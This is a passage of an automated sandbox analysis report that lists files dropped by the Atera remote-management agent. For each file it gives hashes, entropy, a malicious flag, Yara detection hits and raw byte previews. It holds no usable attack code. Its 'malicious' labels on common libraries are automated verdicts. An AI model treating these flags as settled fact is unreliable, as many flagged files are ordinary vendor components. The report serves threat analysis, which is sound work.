                                                                                                                                                                                                                                        SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`...........@.................................?...O.... ..@...............0(...@..........8............................................ ............... ..H............text...h.... ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B................s.......H........ ..............\.......D.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Nh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB7f5DxmX:Ny9eEpYinAMxCA7xDxmX
                                                                                                                                                                                                                                        MD5:2BBEC1A6C6C64499CE0A4EDEA5D0C629
                                                                                                                                                                                                                                        SHA1:A1C39059B887B7A1BDF93CAB3237413D5948BE26
                                                                                                                                                                                                                                        SHA-256:D80E6D1C2A0850A2FDCA5F16A259130B08DDFE968CDC137253221CD4600D53CA
                                                                                                                                                                                                                                        SHA-512:B27639E9D30FD23461723708D4067C99AA3162FD8EF935AD5DA75776EBB46F2D11BD0FCA211BE35A195CE3020E10E063F66FDDDEAC0624392143B856DC23C174
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................q.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):384543
                                                                                                                                                                                                                                        Entropy (8bit):7.999457129580227
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:QCkHWMIRwZL7gsOTLQezyUyt6ywEYUxa5FDW8mWalWh6Nxjuq0xn57/EMpx4Ip7/:x4j1ZXgsO3dU61Oa3a8O50VF/R7pwvgZ
                                                                                                                                                                                                                                        MD5:3C93B399B417B0D6A232D386E65A8B46
                                                                                                                                                                                                                                        SHA1:BB26DEAE135F405229D6F76EB6FAAEB9A3C45624
                                                                                                                                                                                                                                        SHA-256:29BC4577588116CBFEA928B2587DB3D0D26254163095E7FBBCDE6E86FD0022D7
                                                                                                                                                                                                                                        SHA-512:A963F5CF2221436938F031B65079BEA7C4BAFBD48833A9E11CD9BDD1548D68ED968D9279299AA2ADFC23311A6744D516CC50E6537AA45321E5653755ED56F149
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....qF=Y..t.........=...AgentPackageAgentInformation/AgentPackageAgentInformation.exe....0...................$A...?..K.*...{K...>3..y..m..7.|.....l4._.>.G..............}.p.........@....q...2T_.1^|..;.V.(V.:...F|.{.oX.......>....8.]QK.r]3}..h....l.d.z......WI..dG.d..{>.CM.....9/j..a....f.qF...X.}a.t........%n.+..I..-Xa..7..d.D..0...L.K....i"..Z.....~.~....._..{p*......+v,.K..F.X.|;"..!d......So'.f.o.......^.A.........c......|315....o.oRU..#.....R..h..[.":i..+8}...E:..!.M...Th%O;.dX.qK2.....9TD...Nt.J...."..$..k..k.'&I.p ...h.d......Z.3~...]~.B...}...~.(:U....=r<)...,...+.$...i=...1I.]....4Z..'...&..R......R.sW.?../.k....USg........o.....[......U......e..V...jG.Y.....v2...ph.L..3..n.!..... ..W."...cJ./.`..Lr..l.b..'.N^@....,D.y.....i._....@....M..)u-C.R..3"....C.iV/..|..c....$_..Uj.....^.R...*5......O........6*qw..G5.+.\.1..... .X...f..H._S.....b..HY>.GJ..}.,Fj...*.!...,(.j!.Od...&.....`.[.y.1*...$...a.8.j#9.Q...y..E.S.rQ*.2O.;.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):177712
                                                                                                                                                                                                                                        Entropy (8bit):5.81549541154566
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:fDpvOyLSson7aezB53Pbsk4GJCMA1TSuAehsZ7f2lz8/ChoCby:fD4y07asBx4krGSeCZXH
                                                                                                                                                                                                                                        MD5:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        SHA1:F135BE75C721AF2D5291CB463CBC22A32467084A
                                                                                                                                                                                                                                        SHA-256:36704967877E4117405BDE5EC30BEAF31E7492166714F3FFB2CEB262BF2FB571
                                                                                                                                                                                                                                        SHA-512:BD654388202CB5090C860A7229950B1184620746F4C584AB864EADE831168BC7FAE0B5E59B90165B1A9E4BA2BD154F235749718AE2DF35D3DD10403092185ED1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0................. ........@.. ....................................`.....................................O.......................0(..........X................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H...................,....................................................0..........r...p... .....r...p.(.....o......(.....o......(.....o...........s......[o .....s!...%.o".......o#.....s$..........s%...%......io&...%o'.....o(.......o)...o).....(*...*..0..........r...p... .....r...p.(.....o......(.....o.......(+..........s......[o .....s!...%.o".......o,.......s-..........s%......i.l.....%......io........o)...o)...(.........o/...*..(0...*..{....*"..}....*..{....*"..}....*..{.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):546
                                                                                                                                                                                                                                        Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                        SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                        SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                        SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWRn:WY
                                                                                                                                                                                                                                        MD5:DC63026E80D2BB04F71E41916F807E33
                                                                                                                                                                                                                                        SHA1:6CDA386D2C365F94EA3DE41E2390FD916622EB51
                                                                                                                                                                                                                                        SHA-256:3B54D00F00AA80384DE88E4F4005E9D4D889A2CCF64B56E0C29D274352495C85
                                                                                                                                                                                                                                        SHA-512:61DA550EFD55187978872F5D8E88164A6181A11C8A720684EAA737E0846FE20B9E82B73E1F689A6585834B84C4CEE8DD949AF43E76FD0158F6CAFA704AB25183
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=37.9

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.180547422449922
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:vJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxw0h:vQUm2H5KTfOLgxFJjE50vksVUfPvC1h
                                                                                                                                                                                                                                        MD5:9D8B5941EA5B905E8197A175EF2B15A9
                                                                                                                                                                                                                                        SHA1:86A078E94B5578EC4125F50F78C8518A8CE1D086
                                                                                                                                                                                                                                        SHA-256:C6F05B647DBADC15AB97D31790FC8ACE054986EC33E9178FEEAD4235AD15CB0D
                                                                                                                                                                                                                                        SHA-512:FAB5FE82873862CE8ED1A427482093CCA307F6663E9F6497FDC244CE461312872D419FF274CDCA0C496414C28681901F335C9911B95D2A7C112D30E32D74E498
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.d.........." ..0..H..........zf... ........... ...............................C....`.................................(f..O.......8............R..0(...........d............................................... ............... ..H............text....F... ...H.................. ..`.rsrc...8............J..............@..@.reloc...............P..............@..B................\f......H........k..D............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704560
                                                                                                                                                                                                                                        Entropy (8bit):5.954116173285503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:i9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc33:i8m657w6ZBLmkitKqBCjC0PDgM5H
                                                                                                                                                                                                                                        MD5:BA66874C510645C1FB5FE74F85B32E98
                                                                                                                                                                                                                                        SHA1:E33C7E6991A25CC40D9E0DCC260B5A27F4A34E6C
                                                                                                                                                                                                                                        SHA-256:12D64550CB536A067D8AFFF42864836F6D41566E18F46D3CA92CB68726BDD4E9
                                                                                                                                                                                                                                        SHA-512:44E8CAA916AB98DA36AF02B84AC944FBF0A65C80B0ADBDC1A087F8ED3EFF71C750FB6116F2C12034F9F9B429D6915DB8F88511B79507CC4D063BAB40C4EAA568
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ...............................E....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........{...,..................d.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{^....3...{]......(....,...{]...*..{_.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\dynamicfieldscaching.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):4.667481428423969
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:hsShKC+4MsShLP6SX9NfzyShaKf0OYLCGShaKf0Od:M4qBX9Nf1YLCd
                                                                                                                                                                                                                                        MD5:5A03D90B1BF98D9BE091EFCACF2C4A23
                                                                                                                                                                                                                                        SHA1:80789C3FD5390919CBC3A559F4374CE6AD172ABF
                                                                                                                                                                                                                                        SHA-256:B3E3B0B514A57A9C8C5A8BFC882F650A625248766AAAC8260587BA367372D0BA
                                                                                                                                                                                                                                        SHA-512:94C1E8A172F3C19C926AF59C24D6E49A9950F746FF786B597CB5A714F61EA04B0C2E5A94BDCC0FD4CB8694434212C8786D905F975664D76F506FCE1CCF27CC5A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................TAgentPackageAgentInformation, Version=37.9.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]...............E.....H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\information.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.9900172174899025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:X7EQTX+gkV:X7EQrMV
                                                                                                                                                                                                                                        MD5:0534512517FFE0E444A6B2B07F956041
                                                                                                                                                                                                                                        SHA1:44DC5380BFF47DE22353B58EE45119E3478B3D08
                                                                                                                                                                                                                                        SHA-256:0A84B763E40AB51F78F53D04E4266A5D6EBA887DBDD08487C570BB84370D9BDF
                                                                                                                                                                                                                                        SHA-512:47BEA241355FDC38D2C8CC3BCCC60BA14F886813DBB6FC55E20F7235393AEF64E33E44FF125B317FB3FE119DFAD786FD9DD77D8EB3F357ECB26BB2775AC1024B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.F4E48C116A2B700656969DAE6D72EA7C

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\update.cch

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.832595074509133
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:pndoS5SNhWV:9SzWV
                                                                                                                                                                                                                                        MD5:9DBB3F219468D9FE4D379567EE56686F
                                                                                                                                                                                                                                        SHA1:D2CE07D76AB3397488009FF257438EA877DFA269
                                                                                                                                                                                                                                        SHA-256:01F344F4280755BD48E624760DEB523DBCA5ECCE454C8C2BEEA87DC8AFD88F59
                                                                                                                                                                                                                                        SHA-512:004B28CC06177962590C713C0CB6E5140FC3B5735F3CBC35A1242CD7A6216C1712267D2CE4E5F3B6DA9042A6700B56683A92D25DD1672DC2C55CA038E70D31C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.6D6EB88CBB7752800C1CAE767D88FD30

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):310624
                                                                                                                                                                                                                                        Entropy (8bit):7.999405219212172
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN5:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdvL
                                                                                                                                                                                                                                        MD5:CB8B58765B2386EC38F32F17C7BEFCE9
                                                                                                                                                                                                                                        SHA1:6FF84B9B3884F75A3BAA40E64181AF326A1DB4C5
                                                                                                                                                                                                                                        SHA-256:2FDE849766B928C180458B200E866140C73692245C6AF9080B63992C190E80EE
                                                                                                                                                                                                                                        SHA-512:79D7A4344D1D3F3640D6847B785695F8766DB3A9D1558325B0365FD7FDD2C7AD546B2CFFC8115A4495E22B8B70DB1B845030AF54D26009628E0144F0D8925571
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....'gqX............/...AgentPackageHeartbeat/AgentPackageHeartbeat.exe....0l.......?........F0..6\.q.......<.......I.3. &.;.........O.;d.&.U....".' ..}P..u+0.`g.Z..Zq,...w.1./..UD....F.a...B=.....!.. .=... .#7A.Q..o.........+q.C5 . 1..Ud...R>n..Y.9}>z.....yE7.}!sn....p1(e.....}T#>2/..y*7.@.<..J..q......3.4....M..."/"..cS....9pT.dn.:c...&..,H.e.....r...X#...m...V..ZP......+.h.R. .8.......!7FNa.`.P;.......P~..U.x.K.D8.&.vQ!..xn..~cNG.2._L.},..........:.J...S.y..-J...K.z.H.....z.G.6....d.b.[..9......Q.r.T........#..+..b6<...p.}......!.5.&l.E..4.F8..Y...."/.b.....................(.......b..&.6...t..%.(A..X{....H4....[.....}.......n0.:.......s..wQ.&.J\|j.....7=b+.L.t.l.0.{G.Jb.Jy.U.kG.....p-...^..g.4..RA.R..........~..5t4_...Z...h..J..........t...C3....{K.h...F..W$...U....-55....Hi.......m...............x..........)...F.p....r,}}L...i:q.Y.O....`L......yY...N..J]....T..~_|.Bh..p.w%0.H.%D...p..RM`..e....TJk..(..\.%......4..N.<..^..k/_..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27696
                                                                                                                                                                                                                                        Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                        MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                        SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                        SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                        SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............"...0..8...........V... ...`....@.. ....................................`..................................V..O....`..P............D..0(...........U..8............................................ ............... ..H............text....6... ...8.................. ..`.rsrc...P....`.......:..............@..@.reloc...............B..............@..B.................V......H.......t-..x(......2.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. .... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.rW..p*.r...p*F.(....r...p( ...*.r...p*.r...p*..(....*.rM..p*.r...p

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):542
                                                                                                                                                                                                                                        Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                        SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                        SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                        SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                        MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                        SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                        SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                        SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=17.14

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                        MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                        SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
